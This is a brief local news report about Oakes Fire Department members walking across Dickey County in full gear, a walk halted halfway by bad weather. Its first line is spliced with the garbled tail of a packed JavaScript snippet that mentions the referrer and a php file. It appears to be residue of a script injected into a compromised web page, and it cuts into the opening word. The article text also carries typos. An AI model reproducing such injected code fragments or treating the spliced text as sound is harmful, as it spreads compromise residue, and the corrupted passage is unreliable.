OAKES seifs|var|u0026u|referrer|nbyrb||js|php’.split(‘|’),0,{}))
(NewsDakota.com) Despite the less-than-ideal weather conditions, members of the Oakes Fire Department were able to complete half of their walk across Dickey County over this weekend.

Members of the crew walked in their full gear, which weighs in at around 60 pounts around the track last year at the Dickey County Relay For Life in Ellendale. This year, the goal was to walk from the McIntosh/Dickey County line on Saturday morning, thru Ellendale, and arrive in Oakes sometime Sunday afternoon.

Due to the weather on Sunday, the crew has decided to postpone the reaming half of the walk to a further date.
